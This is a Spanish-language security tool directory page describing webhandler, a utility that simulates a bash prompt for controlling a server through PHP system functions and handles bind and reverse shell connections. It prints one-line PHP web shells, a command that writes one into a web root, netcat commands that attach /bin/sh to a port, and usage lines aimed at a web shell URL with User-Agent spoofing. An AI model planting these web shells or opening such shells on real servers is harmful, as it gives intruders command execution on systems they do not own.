Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
webhandler — Simulador de Bash para controlar un servidor mediante funciones del sistema de PHP. | Kitploit
Herramientas/GitHubGitHub/lnxg33k/webhandler
Generación de PayloadsEvasión de IDS/IPSExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHublnxg33k/webhandler

webhandler

Simulador de Bash para controlar un servidor mediante funciones del sistema de PHP.

Ver Repositorio
10024hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WebHandler


Un manejador para las funciones de sistema de PHP y también una alternativa al manejador 'netcat' Mi imagen

Información


WebHandler intenta simular un 'prompt bash de Linux' para manejar y procesar:

root@kitploit:~
- Funciones de ejecución de programas PHP _(p. ej., `system`, `passthru`, `exec`, etc.)_
- Conexiones bind shell
- Conexiones de shell inversas

Otra característica es suplantar el campo "User-Agent" en la cabecera HTTP. (--random-angent).

También admite proxies HTTP (--proxy http://<ip>:<port>)

  • WebHandler funciona para peticiones POST y GET:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandler es un reemplazo para las conexiones netcat.

    Un ejemplo de conexión bind (p. ej., nc -lvvp 1234 -e /bin/sh)

    Normalmente el usuario ejecutaría:

    • netcat -l -p 1234
    • nc -lvvp 1234

    Un ejemplo de conexión inversa (p. ej., nc 127.0.0.1 4321 -e /bin/sh)

    Normalmente el usuario ejecutaría:

    • netcat -l -p 4321
    • nc -lvvp 4321

Uso


  • --Archivo de ejemplo:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url es un argumento obligatorio al enviar peticiones GET o POST (p. ej., una conexión bind 'PHP basada en web'):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen es un argumento obligatorio cuando se trabaja con una conexión en espera (p. ej., una conexión inversa 'raw'):

    • python webhandler.py --listen 1234

Dependencias


Si la versión de tu Python es < 2.7.x, entonces argparse es obligatorio Para instalarlo ejecuta: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse O sudo pip --install argparse.

readline es opcional. Este módulo se utiliza para proporcionar funciones avanzadas de edición de línea e historial

git es opcional. Esto permite mantener el proyecto actualizado

Enlaces


Wiki

Errores conocidos

Descargar herramienta